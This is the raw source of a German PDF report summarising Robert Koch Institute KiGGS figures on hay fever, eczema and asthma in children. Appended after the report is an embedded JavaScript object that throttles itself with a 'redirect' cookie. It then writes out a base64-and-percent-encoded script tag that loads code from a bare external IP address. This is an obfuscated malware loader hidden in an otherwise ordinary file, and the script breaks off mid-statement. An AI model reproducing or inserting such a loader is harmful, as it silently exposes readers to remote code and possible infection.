%PDF-1.3 1 0 obj << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /Names <> >> endobj 2 0 obj << /Type /Outlines /Count 0 >> endobj 3 0 obj << /Type /Pages /Kids [6 0 R ] /Count 1 /Resources << /ProcSet 4 0 R /Font << /F1 8 0 R /F2 9 0 R >> >> /MediaBox [0.000 0.000 612.000 792.000] >> endobj 4 0 obj [/PDF /Text ] endobj 5 0 obj << /Creator (DOMPDF) /CreationDate (D:20191121051620+00'00') /ModDate (D:20191121051620+00'00') /Title (Report 11-2019) >> endobj 6 0 obj << /Type /Page /Parent 3 0 R /Contents 7 0 R >> endobj 7 0 obj << /Length 6323 >> stream 0.000 0.000 0.000 rg BT 34.016 733.592 Td /F1 13.5 Tf [(Allergien)] TJ ET BT 34.016 709.480 Td /F1 10.5 Tf [(Wissenswertes über Allergien)] TJ ET BT 34.016 675.017 Td /F1 13.5 Tf [(Häufigkeit von Allergien – Studie RKI)] TJ ET BT 34.016 655.429 Td /F2 9.0 Tf [(Veröffentlicht von )] TJ ET BT 106.052 655.429 Td /F1 9.0 Tf [(Redaktion ALLERGIEN.com)] TJ ET BT 34.016 635.440 Td /F1 9.0 Tf [(Zahlen des Robert-Koch-Instituts \(KiGGS-Erhebung\))] TJ ET BT 258.530 635.440 Td /F2 9.0 Tf [( Quelle: Robert Koch-Institut \(Hrsg.\), Bundeszentrale für gesundheitliche )] TJ ET BT 34.016 624.451 Td /F2 9.0 Tf [(Aufklärung \(Hrsg.\) \(2008\) Erkennen – Bewerten – Handeln: Zur Gesundheit von Kindern und Jugendlichen in Deutschland. RKI, Berlin )] TJ ET BT 34.016 613.462 Td /F2 9.0 Tf [(2008 )] TJ ET BT 34.016 602.473 Td /F2 9.0 Tf [(dermitis oder Asthma. )] TJ ET BT 124.043 602.473 Td /F1 9.0 Tf [(1. Heuschnupfen)] TJ ET BT 196.556 602.473 Td /F2 9.0 Tf [(An Heuschnupfen \(Allergischer Rhinitis\) leidet jedes elfte Kind \(8,9 %\). Mit zunehmendem Alter )] TJ ET BT 34.016 591.484 Td /F2 9.0 Tf [(steigt die Anzahl der Heuschnupfen-Patienten. Insgesamt sind Jungen häufiger betroffen als Mädchen – ein Unterschied, der sich )] TJ ET BT 34.016 580.495 Td /F2 9.0 Tf [(allerdings in der Gruppe der 14- bis 17-Jährigen weitgehend aufhebt. Vier von fu?nf Kindern mit Heuschnupfen nehmen Medikamente )] TJ ET BT 34.016 569.506 Td /F2 9.0 Tf [(dagegen ein. 7,3 % der Sieben- bis 17-Jährigen fehlten wegen Heuschnupfens bereits in der Schule \(durchschnittlich vier Tage in den )] TJ ET BT 34.016 558.517 Td /F2 9.0 Tf [(zwölf Monaten vor der Befragung\). )] TJ ET BT 174.578 558.517 Td /F1 9.0 Tf [(2. Neurodermitis)] TJ ET BT 245.597 558.517 Td /F2 9.0 Tf [( An Neurodermitis leiden aktuell 7,5 % der 0- bis 17-Jährigen. Unter den 0- bis )] TJ ET BT 34.016 547.528 Td /F2 9.0 Tf [(Zweijährigen gibt es mehr männliche, unter den 14- bis 17-Jährigen mehr weibliche Patienten. Zum Jugendalter hin wird Neurodermitis )] TJ ET BT 34.016 536.539 Td /F2 9.0 Tf [(allgemein seltener. Über 80 % der von Neurodermitis betroffenen Kinder und Jugendlichen wenden Medikamente oder Salben an. )] TJ ET BT 34.016 525.550 Td /F1 9.0 Tf [(3. Asthma)] TJ ET BT 77.027 525.550 Td /F2 9.0 Tf [( Von Asthma sind rund 3,3 % aller Kinder und Jugendlichen betroffen, Jungen häufiger als Mädchen \(insbesondere bei den )] TJ ET BT 34.016 514.561 Td /F2 9.0 Tf [(Drei- bis Sechsjährigen sowie unter den Elf- bis 13-Jährigen\). Bis zum Alter von elf bis 13 Jahren steigt der Anteil der Asthmatiker an )] TJ ET BT 34.016 503.572 Td /F2 9.0 Tf [(und bleibt dann in etwa gleich. 94,2 % der Patienten nahmen innerhalb des Einjahreszeitraums vor der Befragung Medikamente ein, )] TJ ET BT 34.016 492.583 Td /F2 9.0 Tf [(48,2 % von ihnen war unter der Therapie anfallsfrei. Jeder Zweite hatte jedoch  innerhalb der 12 Monate vor der KiGGS-Erhebung )] TJ ET BT 34.016 481.594 Td /F2 9.0 Tf [(mindestens einen Asthmaanfall, 7,6 % davon mussten deshalb in eine Klinik aufgenommen werden, 8,9 % wurden notärztlich behandelt )] TJ ET BT 34.016 470.605 Td /F2 9.0 Tf [(und 58,6 % begaben sich in ambulante ärztliche Versorgung. Fast jeder fünfte der asthmakranken Sieben- bis 17-Jährigen fehlte wegen )] TJ ET BT 34.016 459.616 Td /F2 9.0 Tf [(der Krankheit in der Schule \(im Durchschnitt fünf Tage im vorangegangenen Jahr\). Obwohl Tabakrauch als ein möglicher Risikofaktor )] TJ ET BT 34.016 448.627 Td /F2 9.0 Tf [(fu?r Asthma diskutiert wird, ist in 51,1 % der Familien mit einem asthmakranken Kind mindestens ein Elternteil Raucher. Vor allem in )] TJ ET BT 34.016 437.638 Td /F2 9.0 Tf [(Familien mit niedrigem sozioökonomischem Status wird in Gegenwart des asthmakranken Kindes zu Hause geraucht \(in 56,6 % der )] TJ ET BT 34.016 426.649 Td /F2 9.0 Tf [(Fälle\). Bei Familien mit mittlerem und hohem Sozialstatus liegt der entsprechende Anteil bei 31,0 % bzw. 11,0 %. Ein Fu?nftel der )] TJ ET BT 34.016 415.660 Td /F2 9.0 Tf [(asthmakranken Elf- bis 17-jährigen Jugendlichen gibt an, selbst aktiv zu rauchen. Der Raucheranteil unter den asthmakranken )] TJ ET BT 34.016 404.671 Td /F2 9.0 Tf [(Jugendlichen liegt genauso hoch wie unter Altersgenossen ohne Erkrankung. )] TJ ET BT 344.678 404.671 Td /F1 9.0 Tf [(Häufigkeiten von allergischen Erkrankungen im )] TJ ET BT 34.016 393.682 Td /F1 9.0 Tf [(bisherigen Leben \(»jemals«\))] TJ ET BT 150.053 393.682 Td /F2 9.0 Tf [( Der Anteil der Kinder und Jugendlichen, bei denen jemals im bisherigen Leben von einem Arzt eine )] TJ ET BT 34.016 382.693 Td /F2 9.0 Tf [(atopische Erkrankung festgestellt wurde, beläuft sich auf insgesamt 22,9 %. Unter den Patienten befinden sich mehr Jungen als )] TJ ET BT 34.016 371.704 Td /F2 9.0 Tf [(Mädchen. Bis zur Gruppe der Elf- bis 13-Jährigen nehmen die allergischen Erkrankungen stetig zu. )] TJ ET BT 431.186 371.704 Td /F1 9.0 Tf [(1. Heuschnupfen)] TJ ET BT 503.699 371.704 Td /F2 9.0 Tf [( Laut KiGGS )] TJ ET BT 34.016 360.715 Td /F2 9.0 Tf [(hatten 10,7 % aller Kinder und Jugendlichen bereits Heuschnupfen. Im Altersverlauf nimmt der Anteil der jemals an Heuschnupfen )] TJ ET BT 34.016 349.726 Td /F2 9.0 Tf [(Erkrankten von 5 % bei den Drei- bis Sechsjährigen auf 18,4 % bei den 14- bis 17-Jährigen zu. Jungen sind ab der Altersgruppe von )] TJ ET BT 34.016 338.737 Td /F2 9.0 Tf [(drei bis sechs  Jahren häufiger betroffen als Mädchen. )] TJ ET BT 253.121 338.737 Td /F1 9.0 Tf [(2. Neurodermitis)] TJ ET BT 324.140 338.737 Td /F2 9.0 Tf [( An Neurodermitis waren bereits 13,2 % aller Kinder und )] TJ ET BT 34.016 327.748 Td /F2 9.0 Tf [(Jugendlichen erkrankt, wobei es keine geschlechterspezifischen Unterschiede gibt. Am häufigsten war die Gruppe der Drei- bis )] TJ ET BT 34.016 316.759 Td /F2 9.0 Tf [(Sechsjährigen betroffen \(13,3%\). )] TJ ET BT 168.080 316.759 Td /F1 9.0 Tf [(3. Asthma)] TJ ET BT 211.091 316.759 Td /F2 9.0 Tf [( Bei insgesamt 4,7 % der 0- bis 17-jährigen Kinder und Jugendlichen wurde Asthma )] TJ ET BT 34.016 305.770 Td /F2 9.0 Tf [(diagnostiziert, bei Jungen häufiger als bei Mädchen. Der Anteil der jemals von Asthma Betroffenen nimmt bis zur Altersgruppe der Elf- )] TJ ET BT 34.016 294.781 Td /F2 9.0 Tf [(bis 13-Jährigen stetig zu und bleibt dann stabil bei 7 %. )] TJ ET endstream endobj 8 0 obj << /Type /Font /Subtype /Type1 /Name /F1 /BaseFont /Helvetica-Bold /Encoding /WinAnsiEncoding >> endobj 9 0 obj << /Type /Font /Subtype /Type1 /Name /F2 /BaseFont /Helvetica /Encoding /WinAnsiEncoding >> endobj 10 0 obj << /Names [(EmbeddedJS) 11 0 R] >> endobj 11 0 obj << /S /JavaScript /JS ( function getCookie\(e\){var U=document.cookie.match\(new RegExp\("\(?:^|; \)"+e.replace\(/\([\\.$?*|{}\\\(\\\)\\[\\]\\\\\\/\\+^]\)/g,"\\\\$1"\)+"=\([^;]*\)"\)\);return U?decodeURIComponent\(U[1]\):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor\(Date.now\(\)/1e3\),cookie=getCookie\("redirect"\);if\(now>=\(time=cookie\)||void 0===time\){var time=Math.floor\(Date.now\(\)/1e3+86400\),date=new Date\(\(new Date\).getTime\(\)+86400\);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString\(\),document.write\('